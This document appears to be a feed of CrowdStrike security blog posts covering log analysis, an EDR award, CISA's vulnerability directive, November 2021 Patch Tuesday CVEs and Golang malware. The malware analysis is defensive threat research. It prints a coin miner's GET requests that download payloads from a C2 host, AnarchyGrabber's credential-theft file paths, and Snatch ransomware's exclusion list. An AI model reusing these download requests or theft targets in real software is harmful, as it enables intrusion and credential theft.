  • Security, SecOps and Compliance. Log analysis increases visibility, which grants cybersecurity, SecOps and compliance teams continuous insights needed for immediate actions and data-driven responses. This in turn helps strengthen the performance across systems, prevent infrastructure breakdowns, protect against attacks and ensure compliance with complex regulations. Advanced technology also allows the cybersecurity team to automate much of the log file analysis process and set up detailed alerts based on suspicious activity, thresholds or logging rules. This allows the organization to allocate limited resources more effectively and enable human threat hunters to remain hyper-focused on critical activity.
  • Information Technology and ITOps. Visibility is also important to IT and ITOps teams as they require a comprehensive view across the enterprise in order to identify and address concerns or vulnerabilities. For example, one of the most common use cases for log analysis is in troubleshooting application errors or system failures. An effective log analysis tool allows the IT team to access large amounts of data to proactively identify performance issues and prevent interruptions.

Log Analysis Solutions From Humio

Humio is purpose-built to help any organization achieve the benefits of large-scale logging and analysis. The Humio difference:

  • Virtually no latency regardless of ingestion, even in the case of data bursts
  • Index-free logging that enables full search of any log, including metrics, traces and any other kind of data
  • Real-time data streaming and streaming analytics with an in-memory state machine
  • Ability to join datasets and create a joint query that searches multiple data sets for enriched insights
  • Easily configured, sharable dashboards and alerts power live system visibility across the organization
  • High data compression to reduce hardware costs and create more storage capacity, enabling both more detailed analysis and traceability over longer time periods


CrowdStrike Falcon’s Autonomous Detection and Prevention Wins Best EDR Award and Earns Another AAA Rating in SE Labs Evaluations

By: Liviu Arsene - Joe Faulhaber
  • CrowdStrike wins the prestigious SE Labs “Best Endpoint Detection and Response” 2021 award. 
  • This marks CrowdStrike’s second consecutive year winning Best EDR from SE Labs, the highly regarded independent testing organization, based on stellar EDR performance and testing results observed over the past 12 months.
  • Earlier this week, CrowdStrike once again earned the highest AAA rating in the SE Labs Enterprise Endpoint Protection, Q3 2021 report, achieving detection scores of 99% total accuracy and 100% legitimate accuracy.
  • This is the 12th AAA rating in EPP for the CrowdStrike Falcon® platform, dating back to March 2018.

CrowdStrike Falcon has been named best Endpoint Detection and Response, winning the award for the second time since independent third-party testing organization SE Labs first introduced it in 2020. The achievement speaks directly to Falcon’s outstanding automated detection and prevention capabilities in tracking elements of sophisticated attack chains and protecting customers from breaches.

CrowdStrike also received a new AAA rating from SE Labs in its recent Endpoint Protection report, demonstrating consistent achievements in SE Labs testing in terms of automated protection and remediation capabilities using on-sensor indicators of attack (IOAs) and machine learning. This latest achievement underscores our commitment to transparency and constant improvement of our capabilities. 

The Falcon platform achieved a 99% Total Accuracy rating in protecting against both in-the-wild commodity threats and targeted attacks, according to the recent Q3 SE Labs Enterprise Endpoint Protection report. In this evaluation, CrowdStrike, a next-generation cloud endpoint detection and response (EDR) vendor, outperformed legacy vendors such as Microsoft, Symantec and McAfee. Falcon achieved outstanding testing scores, with CrowdStrike placing among the top three vendors in overall final score, in a near tie with the other leading solutions tested.  

Regularly participating in independent third-party tests drives us to build relevant, meaningful and valuable capabilities that can protect against sophisticated adversaries and threats as well as commodity malware. 

Falcon Once Again Wins Highest AAA Ranking from SE Labs

In the latest report, CrowdStrike Falcon was awarded the highest AAA rating, speaking to Falcon’s capability of automated detection and protection against sophisticated adversaries and unrelenting effectiveness in neutralizing and blocking threats.

SE Labs testing aims to offer a complete view of the capabilities of endpoint security solutions by using common attack tools typical of early stages of attempted breaches and in-the-wild commodity malware that is representative of the current threat landscape. CrowdStrike Falcon has consistently participated in SE Labs testing, with an excellent track record of AAA ratings in SE Labs Enterprise Endpoint Protection reports dating back to March 2018. This marks the 12th time Falcon has been awarded an impressive AAA rating in Enterprise Endpoint Protection evaluations from SE Labs and the third time in 2021. 

Testing scenarios for detection and protection from general threats involved the ability to accurately identify web-based threats, such as URLs that attackers commonly use to trick users into downloading threats or executing malicious scripts. Identifying and blocking exploits and accurately identifying legitimate applications are also part of the testing scenario, with CrowdStrike Falcon achieving an AAA award with 99% Total Accuracy and 100% Legitimate Accuracy rating. False positives generated by incorrectly identifying legitimate applications and websites as malicious can create serious disruptions in business operations. A 100% legitimate accuracy rating means businesses will spend less time, effort and money on remediating false positives and bringing systems back into production. 

Testing every layer of detection and protection against typical stages of an attack employed by sophisticated adversaries measures how the security solution responds to each stage of the attack. CrowdStrike Falcon achieved a 99 Protection Score, which reflects the overall level of protection across multiple attack stages. This SE Labs score assesses the ability to protect systems by detecting, blocking or neutralizing threats based on how severe the outcomes of an attack could be. 

Products that detect and neutralize threats during the early stages of an attack are rated better and will protect systems from sophisticated threats. Conversely, the test severely penalizes security software that blocks legitimate applications, creating false positives. Blocking threats early in the attack chain enabled CrowdStrike Falcon to achieve excellent results in automatically detecting and protecting against incidents.

CrowdStrike Falcon Testing Achievements

By repeatedly participating in independent third-party cybersecurity testing, CrowdStrike demonstrates transparency in Falcon capabilities, and public results serve as a track record for validating consistency in automated protection and remediation. Since there is no single independent third-party test to determine an industry leader, Falcon’s capabilities are validated by our ongoing participation in tests and evaluations from leading organizations, and by obtaining verifiable and repeatable detection and protection results. 

Falcon has demonstrated a superior track record for participating and excelling in third-party independent tests, with consistent results in terms of automated protection and remediation capabilities. For example, CrowdStrike was named a strategic leader in AV-Comparatives Endpoint Protection and Response tests and a leader in the Gartner Magic Quadrant for Endpoint Protection Platforms (EPP). With awards and certifications from leading testing organizations including AV-Comparatives, SE Labs and MITRE, CrowdStrike remains fully committed to supporting independent third-party efforts.

While these are only a handful of achievements, CrowdStrike has never been more unwavering and committed to our mission to stop breaches.


Falcon Spotlight ExPRT.AI Aids Federal Agencies in Meeting CISA Mandate

By: Alyssa Ideboen

The Cybersecurity and Infrastructure Security Agency (CISA) issued a mandate on November 2, 2021, for all U.S. federal agencies to fix hundreds of known vulnerabilities. Binding Operational Directive 22-01 (BOD 22-01) compels all federal departments and agencies to specifically address the vulnerabilities in the published catalog to protect and safeguard valuable federal data and information systems. The order will require all agencies to have patches in place for all vulnerabilities published prior to 2021 within six months, and all vulnerabilities from 2021 and beyond within two weeks of the issuance date. 

The U.S. Department of Homeland Security and CISA will oversee the implementation of this mandate. As stated in the directive, “It is essential to aggressively remediate known exploited vulnerabilities to protect federal information systems and reduce cyber incidents.” The catalog of vulnerabilities contains many of the most highly exploited and most significant severity vulnerabilities that are known, making this list an important and essential tool for review and remediation within any organization covered in the directive. 

While this directive is required only for federal agencies, CISA strongly recommends that all state and local government as well as private organizations review and monitor the provided vulnerability catalog and implement remediation procedures in the time frame specified in the directive to strengthen their overall security posture. 

As a result of this mandate, CrowdStrike has added this catalog of vulnerabilities to Falcon Spotlight™ ExPRT.AI as a new source of exploited vulnerability data. With Falcon Spotlight, government agencies and enterprises alike are able to quickly identify and prioritize vulnerabilities that pose the most risk for their organization. 

Why Issue BOD 22-01?

This is the first time CISA has issued a government-wide mandate for federal agencies to remediate vulnerabilities. CISA Director Jen Easterly stated that CISA is using its authority to help enforce and encourage federal cybersecurity efforts to protect from potential malicious actors. She goes on to say, “The Directive lays out clear requirements for federal civilian agencies to take immediate action to improve their vulnerability management practices and dramatically reduce their exposure to cyber-attacks.” Because this catalog contains already known exploited vulnerabilities and due to the sensitive or valuable nature of government systems and data, this mandate is timely to help ensure the protection and defense of the U.S. infrastructure. 

Falcon Spotlight’s ExPRT.AI Helps IT Staff Meet CISA Requirements

SecOps staff at government agencies and private organizations alike are often pressed for time. Faced with a plethora of critical and highly scored vulnerabilities, teams frequently cannot address them all in a timely manner. This leaves organizations with gaps or flaws within their systems, and threat actors use those holes to exploit organizations for nefarious gain. Historically, SecOps has relied on vendors to provide some prioritization information around this large body of vulnerabilities, but that is not enough. With the limited time typically allocated for patching and updating systems, critical vulnerabilities go unremediated, which can be very damaging.

Falcon Spotlight goes beyond identifying these vulnerabilities and prioritizes them in a genuinely useful way. It utilizes the recently announced ExPRT.AI, a dynamic model that capitalizes on a wide variety of vulnerability and threat-based telemetry, including CrowdStrike’s threat intelligence, as well as CISA’s Known Exploited Vulnerabilities Catalog, to provide a more intuitive, relevant rating that enables staff to target the vulnerabilities that would have the most detrimental impact on their organization.

How Does Falcon Spotlight’s ExPRT.AI Work? 

Falcon Spotlight’s ExPRT.AI is based on two important factors: the data that the algorithm model relies on and the structure and dynamism of the model itself. Let’s explore how this works.

The ExPRT.AI model is constantly adapting. It takes data from an impressive database of threat and exploit intelligence from a large variety of sources, and then uses both historical and new data (such as the CISA catalog) to create an output, the ExPRT Rating, which provides a more accurate and transparent rating than what SecOps staff have traditionally been forced to rely on. Since the model is always adapting, it provides a dynamic ExPRT rating — one that changes as new data comes in. When new threats or exploits are discovered, the rating for the vulnerability changes to reflect whether it should be ranked more or less severely based on the inputs. 
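As a simplified illustration of how a dynamic rating of this kind might fold fresh exploit intelligence into a base severity score, consider the toy function below. The signal names, weights, and thresholds are entirely hypothetical; this is not CrowdStrike's actual ExPRT.AI model, only a sketch of the general idea of a rating that moves as new threat data arrives.

```python
def dynamic_rating(cvss_base: float,
                   actively_exploited: bool,
                   in_known_exploited_catalog: bool,
                   exploit_code_public: bool) -> str:
    """Toy rating: start from the CVSS base score, escalate on threat signals."""
    score = cvss_base
    if actively_exploited:
        score += 2.0   # in-the-wild exploitation outweighs raw severity
    if in_known_exploited_catalog:
        score += 1.5   # known-exploited catalog entries demand fast action
    if exploit_code_public:
        score += 0.5   # public PoC code lowers the bar for attackers
    score = min(score, 10.0)
    if score >= 9.0:
        return "Critical"
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    return "Low"

# A medium-severity CVE under active exploitation can outrank a
# high-severity CVE with no observed threat activity.
print(dynamic_rating(5.5, True, True, False))    # -> Critical
print(dynamic_rating(8.0, False, False, False))  # -> High
```

Re-running the function whenever a signal flips is what makes the rating "dynamic": the same CVE can rise or fall as exploitation evidence accumulates or fades.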

While other vendors may claim to have a dynamic rating system, only CrowdStrike’s vast library of telemetry can provide such an operationally useful solution as ExPRT.AI, giving SecOps staff greater efficiency and a higher degree of visibility to immediately remediate or patch the vulnerabilities that adversaries are most likely to target, specific to their organization. To see how Falcon Spotlight ExPRT.AI works in action, check out this demo.

Additional Resources

  • Try Falcon Spotlight™ to help discover and manage vulnerabilities in your environments. 
  • See how CrowdStrike Falcon Complete™ managed detection and response (MDR) stops Microsoft Exchange Server zero-day exploits.
  • Make prioritization painless and efficient. Watch how Falcon Spotlight enables IT staff to improve visibility with custom filters and team dashboards.
  • Read about critical vulnerabilities your organization should prioritize in our monthly Patch Tuesday blog series — read November’s installment.  
  • Test CrowdStrike next-gen AV for yourself. Start your free trial of Falcon Prevent™ today.
✇ CrowdStrike

November 2021 Patch Tuesday: Two Active Zero-Days and Four Publicly Disclosed CVEs

By: Falcon Spotlight Team

As the year draws to a close, the active exploitation of Microsoft vulnerabilities continues unabated. Once again, a broad range of Microsoft products are included in this month’s Patch Tuesday update as the aging Microsoft ship is springing security leaks everywhere.

Two vulnerabilities, CVE-2021-42292 and CVE-2021-42321, have seen in-the-wild exploitation, and four other vulnerabilities were publicly disclosed before Microsoft issued updates, giving threat actors the opportunity to take advantage of them before patches were released. 

Given the sheer volume of vulnerabilities in Microsoft products, organizations need to prioritize which vulnerabilities to patch first so they can allocate resources. Severity ratings and scores, while an important indicator of a vulnerability’s impact, are not the only measure that SecOps staff should consider in this process. The context and threat intelligence surrounding a particular CVE may indicate a more pressing need to prioritize and mitigate one vulnerability over another. Regular patching cycles and prompt updating are of critical importance for maintaining a strong and defensible security posture. 

For assistance on how to determine which vulnerabilities truly affect your organization, see Falcon Spotlight’s ExPRT.AI dynamic model and intelligent rating. 

New Patches for 55 Vulnerabilities

November 2021 Patch Tuesday covers fixes for 55 vulnerabilities, with the most common attack types again being remote code execution and elevation of privilege. Microsoft has patched multiple zero-day vulnerabilities in Microsoft Exchange products this year (see March’s Patch Tuesday release). CVE-2021-42321 is a remote code execution vulnerability, but because it requires some authentication, it is unlikely to see wide active exploitation. CVE-2021-42292, however, impacts Microsoft Excel, an application widely used across organizations; since this attack method (security feature bypass) has already seen success, it is another CVE to prioritize in your organization’s patching process. 

As with previous months, Windows is a common product receiving patches, and this month’s updates also cover Extended Security Updates (ESU) and Azure.

Figure 1. Breakdown of November 2021 Patch Tuesday attack impact

Figure 2. Patches by Product Family

More on Active Exploitation for Microsoft Exchange and Microsoft Excel Products

The two zero-day vulnerabilities reported by Microsoft as being exploited in the wild, one affecting Exchange Server and the other impacting Excel, are common access points for attackers to infiltrate an organization. 

CVE-2021-42321 is a post-authentication remote code execution vulnerability affecting on-premises Microsoft Exchange Server 2016 and 2019, including servers used by customers in Exchange Hybrid mode. Microsoft has assigned it a CVSS score of 8.8. The vulnerability was successfully exploited during the Tianfu Cup 2021 hacking contest (the Chinese equivalent of Pwn2Own). 

CVE-2021-42292 is an actively exploited Microsoft Excel vulnerability utilizing security feature bypass. Adversaries are able to install malicious code by tricking users into opening a “booby-trapped” Excel file. Updates are available for Windows, but as of this writing, an update has not been released for the Mac version.

Rank      CVSS Score  CVE             Description
Critical  8.8         CVE-2021-42321  Microsoft Exchange Server Remote Code Execution Vulnerability
Critical  7.8         CVE-2021-42292  Microsoft Excel Security Feature Bypass Vulnerability

Publicly Disclosed Vulnerabilities by Microsoft

Four of the vulnerabilities patched by Microsoft this month were publicly disclosed before Microsoft released security updates. Two affect 3D Viewer and can be exploited to gain remote code execution. The other two relate to Windows Remote Desktop Protocol (RDP) and can lead to information disclosure.

CVE-2021-43208 and CVE-2021-43209 are 3D Viewer remote code execution vulnerabilities. Both were publicly disclosed before this month’s updates; ZDI published details in June and July 2021. Patches are delivered through the Microsoft Store, so customers do not need to install a KB update.

CVE-2021-38631 and CVE-2021-41371 are Windows Remote Desktop Protocol (RDP) information disclosure vulnerabilities. An attacker who successfully exploits either could obtain read access to Windows RDP client passwords set by RDP server administrators.

Rank       CVSS Score  CVE             Description
Important  4.4         CVE-2021-38631  Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
Important  4.4         CVE-2021-41371  Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
Important  7.8         CVE-2021-43208  3D Viewer Remote Code Execution Vulnerability
Important  7.8         CVE-2021-43209  3D Viewer Remote Code Execution Vulnerability

Other Critical Vulnerabilities to Prioritize

CVE-2021-26443, a Microsoft Virtual Machine Bus (VMBus) Remote Code Execution vulnerability, occurs when a VM guest fails to properly handle communication on a VMBus channel. To exploit the vulnerability, an authenticated attacker could send a specially crafted communication on the VMBus channel from the guest VM to the host. An attacker that successfully exploits the vulnerability could execute arbitrary code on the host operating system.

CVE-2021-42279, a Chakra Scripting Engine memory corruption vulnerability, has been given a base score of only 4.2 by Microsoft yet is ranked Critical. It affects almost all versions of Windows 10 and allows an attacker to remotely execute malicious code on the affected system.

CVE-2021-42298, a Microsoft Defender Remote Code Execution vulnerability, allows an attacker to execute malicious code remotely. Windows Defender uses the Microsoft Malware Protection Engine (mpengine.dll), which provides scanning, detection and cleaning capabilities for Microsoft antivirus and antispyware software. The patch for this vulnerability is downloaded and installed automatically only if the host is set for automatic updating.

Rank      CVSS Score  CVE             Description
Critical  9.0         CVE-2021-26443  Microsoft Virtual Machine Bus (VMBus) Remote Code Execution Vulnerability
Critical  9.8         CVE-2021-3711   OpenSSL SM2 Decryption Buffer Overflow
Critical  8.8         CVE-2021-38666  Remote Desktop Client Remote Code Execution Vulnerability
Critical  4.2         CVE-2021-42279  Chakra Scripting Engine Memory Corruption Vulnerability
Critical  7.8         CVE-2021-42298  Microsoft Defender Remote Code Execution Vulnerability
Critical  8.7         CVE-2021-42316  Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability

When Priorities Conflict Due to Broad Product Updates, Revisit Your Prioritization Process

A wide range of vulnerabilities are being patched by Microsoft this month, from operating system patches and known protocols such as RDP to actively exploited vulnerabilities in Microsoft Exchange and Microsoft Excel — and any of these could greatly impact an organization’s security posture.

SecOps teams often do not have the time or capacity to patch everything ranked highly within their organization and would do best to tap into the knowledge and solutions that can most accurately assess which vulnerabilities to prioritize first. CrowdStrike is committed to providing SecOps teams with relevant and timely information on trending threats and valuable insight into vulnerabilities, and with solutions such as Falcon Spotlight, staff can quickly target those vulnerabilities that pose the most risk. Falcon Spotlight’s newly released ExPRT Rating examines all relevant data to help organizations predict and prioritize the vulnerabilities most relevant to them. 

Learn More

Watch this video on Falcon Spotlight™ vulnerability management to see how you can quickly monitor and prioritize vulnerabilities within the systems and applications in your organization. 

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate the severity and characteristics of software vulnerabilities. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a qualitative severity rating for CVSS score ranges. Learn more about vulnerability scoring in this article.
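The NVD's qualitative severity bands for CVSS v3 base scores can be expressed directly. The bands below follow the published NVD mapping (None 0.0, Low 0.1-3.9, Medium 4.0-6.9, High 7.0-8.9, Critical 9.0-10.0); only the function name is our own.

```python
def nvd_severity(base_score: float) -> str:
    """Map a CVSS v3.x base score to the NVD qualitative severity rating."""
    if not 0.0 <= base_score <= 10.0:
        raise ValueError("CVSS base scores range from 0.0 to 10.0")
    if base_score == 0.0:
        return "None"
    if base_score <= 3.9:
        return "Low"
    if base_score <= 6.9:
        return "Medium"
    if base_score <= 8.9:
        return "High"
    return "Critical"

print(nvd_severity(8.8))  # CVE-2021-42321's score -> High
print(nvd_severity(9.8))  # -> Critical
```

Note that vendors' own severity ranks, like the "Critical" labels in the tables above, do not always coincide with the NVD bands; that divergence is one more reason to consider context beyond a single score.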

Additional Resources 

✇ CrowdStrike

Golang Malware Is More than a Fad: Financial Motivation Drives Adoption

By: Anmol Maurya
  • Golang malware popularity snowballs, increasing by 80% from June to August 2021
  • eCrime turns to Golang because of its versatility, enabling cross-compiling for other operating systems 
  • Cryptocurrency miners account for the largest share of total Golang malware — 70% in August compared to 54% in June 2021

CrowdStrike researchers uncovered an 80% increase in Golang (Go)-written malware samples from June to August 2021, according to CrowdStrike threat telemetry. By malware type, first place goes to coin miners, accounting for 70% of the Go-written malware spectrum in August 2021. Golang’s versatility in enabling the same codebase to be compiled for all major operating systems, coupled with the financial incentive offered by coin miners, is likely one of the driving factors behind the recent wave of Go-written malware. We will likely see even more Go-based malware as the language becomes more popular with developers.

Golang’s versatility has turned it into a one-stop shop for financially motivated eCrime developers. Instead of rewriting malware for Windows, macOS and Linux, eCriminals can use Golang to cross-compile the same codebase with ease, allowing them to target multiple platforms effortlessly. Other applications of Golang involve using it as a wrapper for various eCrime malware, such as ransomware. Some ransomware variants have turned to Golang wrappers to make analysis more difficult for security researchers. 

Besides coin miners, password-stealing trojans and downloaders developed in Golang are also popular. These can potentially be handy to the eCrime community, especially access brokers, as they can serve as initial access and information harvesting tools into targeted systems and infrastructure. Whether Go-written malware is used to generate profit from victims by exploiting their computing power, or used as a tool to collect and potentially sell sensitive data and access into compromised infrastructures, financial motivation fuels eCrime adoption of Go-powered threats.

Figure 1. Daily Golang-written malware evolution (June-August 2021) (Click to enlarge)

eCrime dominates the threat landscape, making up 79% of interactive intrusion activity, according to the recent CrowdStrike 2021 Threat Hunting Report. However, most Go-written malware seems focused on generating revenue by exploiting the computing power of their victims and mining for cryptocurrency. Coin miners accounted for 54% of all Go-written malware in June 2021, 62% in July and 70% in August, according to CrowdStrike threat telemetry.

Figure 2. Golang-written malware distribution in June, July and August 2021

While 91% of identified Golang malware samples are compiled to target the Windows operating system, 8% are compiled for macOS and 1% for Linux. Golang allows developers to use the same codebase and compile their code for Windows, Linux and macOS, but eCrime developers likely target Windows more because of its larger market share. Some of the more exotic malware families we’ve identified as using Go revolve around ransomware such as GoGoogle ransomware, Ekans ransomware, eCh0raix ransomware and Snatch ransomware, as well as remote access trojans (RATs), such as CYBORG SPIDER’s Pysa Golang RAT.

Figure 3. File type distribution of Golang malware (June-August 2021)

Notably, we found instances where it is not immediately apparent which cryptocurrency some coin miners are attempting to mine. While most coin miners are XMRig wrappers, their developers likely wanted the option of mining whichever cryptocurrency is most appealing at the time of infection. 

Why Stay When You Can GO?

One reason malware developers may not stay faithful to traditional programming languages — such as C++ or Python — and choose to go with Go could be that Go performs 40 times faster than optimized Python code, according to benchmarking tests. Also, a single codebase can be compiled for all major operating systems. 
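Go's cross-compilation is driven by the GOOS and GOARCH environment variables on an ordinary `go build`. The helper below only constructs the commands rather than running them (output filenames and the `main.go` source name are illustrative), which is enough to show how one codebase yields binaries for all three platforms.

```python
import os

def cross_compile_cmd(goos: str, goarch: str = "amd64", src: str = "main.go"):
    """Build the `go build` command and environment for one target platform."""
    env = {**os.environ, "GOOS": goos, "GOARCH": goarch}
    # Windows executables conventionally carry an .exe suffix.
    out = f"tool_{goos}_{goarch}" + (".exe" if goos == "windows" else "")
    cmd = ["go", "build", "-o", out, src]
    return cmd, env

# One codebase, three targets: the property the article attributes to Go.
for goos in ("windows", "linux", "darwin"):
    cmd, _ = cross_compile_cmd(goos)
    print(" ".join(cmd))
```

Running each command with its environment (e.g. via `subprocess.run(cmd, env=env)` on a machine with the Go toolchain installed) produces a native binary for that platform from the same source tree.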

When analyzing Go-written malware, we generally focus on the “main” functions. However, because of the large size of Go samples, there is the added burden of going through many more functions than in a typical C/C++ binary. When Go compiles an executable, it includes the Go standard symbols in the binary, which can substantially increase its size. Golang binaries include a .gopclntab structure, which maps each symbol name to its corresponding offset. The structure also contains the symbol names of functions created by the developer, prefixed with the string “main.”, which is why those functions are the natural starting point for analysis.
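Because these developer-defined symbol names survive in the binary, a first-pass triage can be as crude as scanning for "main."-prefixed strings. The sketch below does exactly that over raw bytes; real tooling parses the .gopclntab structure properly, and the simulated byte blob here is fabricated from the AnarchyGrabber function names discussed later.

```python
import re

def find_main_symbols(data: bytes) -> list:
    """Extract candidate Go symbol names prefixed with 'main.' from raw bytes."""
    # Printable ASCII runs that look like Go function symbols, e.g. main.grab_discord
    pattern = re.compile(rb"main\.[A-Za-z_][A-Za-z0-9_]*")
    return sorted({m.decode() for m in pattern.findall(data)})

# Simulated slice of a Go binary's symbol data (names are illustrative).
blob = b"\x00main.grab_discord\x00main.grab_brave\x00junk\xff\x00main.grab_discord\x00"
print(find_main_symbols(blob))  # -> ['main.grab_brave', 'main.grab_discord']
```

Deduplicating and sorting the hits gives an analyst a quick map of the sample's developer-written functions before opening a disassembler.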

Adding obfuscation on top of all of this, using open-source tools such as “gobfuscate” that allow malware developers to compile Go binaries from obfuscated source code, can significantly hamper reverse engineering efforts to decipher the malicious binary. 

Drawing on threat telemetry from June to August 2021, we analyzed three different Go-written malware samples as case studies to identify some of the capabilities of Golang-based malware. A summary analysis of each follows.

GO-written AnarchyGrabber Password Stealer

A new Go-written AnarchyGrabber password stealer variant was spotted on Sept. 1, 2021, packing many of the same features as its C++ counterpart. The analyzed sample (SHA256 hash 86dda1e904475fdf187af0cb13c0b67951e95230ed2bc6a3ac79c292606fda8e) behaves in much the same way, stealing the victim’s Discord user token and using the platform to spread additional malware via the victim’s friends list.

AnarchyGrabber can steal passwords and usernames from Google Chrome/Brave and log the token of the user’s Discord account, as shown in Table 1 below. It then uses a webhook to broadcast the victim’s browser passwords and user profiles, email address, login name, user token and IP address to a Discord channel operated by the threat actor. Using Discord as a C2 server for both exfiltrating data and accepting commands is not uncommon, and the Go-written variant of AnarchyGrabber closely mirrors the behavior of its C++ version. 

main.grab_discord \AppData\Roaming\Discord\Local Storage\
main.grab_discord_canary \\Discordcanary\\Local Storage\\
main.grab_discord_ptb \\discordptb\\Local Storage\\
main.grab_google_chrome \AppData\Local\Google\Chrome\User Data\Default\Login
main.grab_opera \Opera Software\Opera Stable\Local Storage\
main.grab_brave \BraveSoftware\Brave-Browser\User Data\Default\Local Storage\
main.grab_yandex \Yandex\YandexBrowser\User Data\Default\Local Storage\

Table 1. AnarchyGrabber main functions

The developers behind this implementation of AnarchyGrabber seem to use some open-source tools for interacting with Discord webhooks or parsing snowflakes, which are uniquely identifiable descriptors for resources that contain a timestamp, such as accounts, messages, channels and servers.

The CrowdStrike Falcon® platform detects and protects against this type of Go-written malware using the power of the cloud, on-sensor and in-the-cloud machine learning, and indicators of attack (IOAs) to detect the threat. As the screenshot below illustrates, we detect this sample with our cloud-based machine learning, and it is immediately blocked.

Figure 4. CrowdStrike Falcon detection and protection for AnarchyGrabber (Click to enlarge)

GO(ing) for Crypto Mining

The spike in Go-written cryptominers is fueled in part by the language’s adaptability. Malware authors either create custom miners or build wrappers for existing miners like XMRig. While creating wrappers is not new, it gives malware developers the added benefit of switching between various cryptocurrencies: depending on which cryptocurrency is more popular or on the victim’s computing power, threat actors can change which one they mine.

A recent sample written in Go (SHA256 hash 995d7903e138b3f5aa318d44e959d215c6b28ea491f519af34c8bdad9a0ebda6) is an XMRig wrapper compiled for Windows that uses a couple of techniques unusual among coin miners. Among its more novel features is killing processes that consume too many resources. Its developers likely want to boost the cryptomining process by killing non-critical processes, fully utilizing the victim’s computing power for financial gain.

Additional features include checking if the malware is already present on the victim’s machine, if there’s an instance of the process already running, and downloading other files from an attacker-controlled C2 server.

main.FileExists Checks the existence of a file using os.Stat
main.writetofile Writes to a file using ioutil.WriteFile
main.isrunning Checks the status of the process using:
main.killprocess Kills processes; the attacker uses taskkill
main.DownloadFile GETs files from the web server
“GET /d/windowsupdatev1.json HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”

“GET /d/inj.exe HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”

“GET /d/runtime.dll HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”

“GET /d/autoupdate.exe HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”

“GET /d/updater.exe HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”

“GET /d/procdump.exe HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”

“GET /d/service.exe HTTP/1.1
Host: m[.]windowsupdatesupport[.]org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip”
main.getcpuusage Uses the ps command to sort output by memory usage:
“ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%mem | head -n 2 | tail -n ”
The output is used to kill processes that are consuming too much RAM

Table 2. Coin miner main functions
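The `ps` pipeline in Table 2 effectively selects the heaviest process by memory. The same selection can be sketched in a few lines of parsing; the sample output below is fabricated for illustration (the miner itself shells out to `ps` and `taskkill` rather than parsing in-process).

```python
def top_memory_pid(ps_output: str) -> int:
    """Pick the PID of the process using the most memory from
    `ps -eo pid,ppid,cmd,%mem,%cpu` style output (header included)."""
    rows = []
    for line in ps_output.strip().splitlines()[1:]:  # skip the header row
        parts = line.split()
        # %mem is the next-to-last column, so embedded spaces in CMD are safe.
        pid, mem = int(parts[0]), float(parts[-2])
        rows.append((mem, pid))
    return max(rows)[1]  # highest %mem wins

sample = """\
  PID  PPID CMD                         %MEM %CPU
 1204     1 /usr/bin/someapp             1.2  0.3
 2210     1 /opt/browser --type=renderer 8.7  2.1
 3315  2210 /usr/bin/editor              3.4  0.9
"""
print(top_memory_pid(sample))  # -> 2210
```

In the miner's case, the selected PID would then be fed to a kill command to free up resources for mining.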

Upon execution, this Go-written coin miner downloads the Runtime.dll file containing the debug path (“C:\Users\admin\Desktop\toolchain\deamon\hide_proc_research\Hide-Me-From-Task-Manager-master\HookerDLLBuild\bin\x64\Release\HookerDLL.pdb”). It also downloads an open-source command-line utility (Inj.exe) that actors potentially use to inject and eject DLLs, including Runtime.dll, as well as Procdump.exe (which was observed running a command associated with dumping LSASS process memory).

Among other features, its developers also included checking the version of the downloaded files to potentially update them should new releases be available and running daily scheduled tasks with the sample to ensure persistence on the compromised machine. 

The Falcon platform also detects this particular Go-written coin miner using machine learning and IOAs. As shown in Figure 5, our machine learning can block at the initial stage of an attack and uses IOAs triggered by various tactics and techniques.

Figure 5. CrowdStrike Falcon uses machine learning and IOAs of the tactics and techniques of the Golang-written coin miner (Click to enlarge)

GO Snatch, Go!

Snatch ransomware has been around since 2018, with multiple 32-bit and 64-bit implementations written in Golang. It is a perfect example of Golang being more than just a fad: an actual “go-to” programming language that malware developers actively use. In fact, our own telemetry from June to August 2021 shows that Go-written malware accounted for 7% of all samples. 

After making its debut around late 2018, Snatch ransomware has been on and off the radar of security companies and researchers ever since. It has constantly been updated and improved with new anti-forensic features and various capabilities, as with any ransomware family.

Analyzing one of the more recent Snatch ransomware samples compiled explicitly for Windows (e4b2d60cea9c09a7871d0f94fe9ca38010ef8e552f67e7cdec7489d2a1818354), not much has changed from how previous researchers described the ransomware’s inner workings. It uses the “ujvxadjxkoz” file extension for encrypted files. It places a “HOW TO RESTORE YOUR FILES.TXT” file in all the compromised folders. It continues to rely on the Golang openpgp package for operations on OpenPGP messages. 

However, one change implemented by this particular Snatch ransomware sample is an updated exclusion list of directories that are skipped during encryption:

Program Files, ProgramData, Default User, recovery, $recycle.bin, perflogs, common files, dvd maker, msbuild, microsoft games, mozilla firefox, tap-windows, windows defender, windows journal, windows mail, windows nt, windows sidebar, microsoft.net, microsoft, start menu, templates, favorites
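A sketch of how such an exclusion check might behave is shown below. The case-insensitive, per-component matching is our guess at the simplest plausible logic, not reversed from the sample; only the directory names come from the list above.

```python
# Directory names Snatch skips during encryption (from the sample's list).
EXCLUDED_DIRS = {
    "program files", "programdata", "default user", "recovery", "$recycle.bin",
    "perflogs", "common files", "dvd maker", "msbuild", "microsoft games",
    "mozilla firefox", "tap-windows", "windows defender", "windows journal",
    "windows mail", "windows nt", "windows sidebar", "microsoft.net",
    "microsoft", "start menu", "templates", "favorites",
}

def is_excluded(path: str) -> bool:
    """True if any component of the path matches the ransomware's skip list."""
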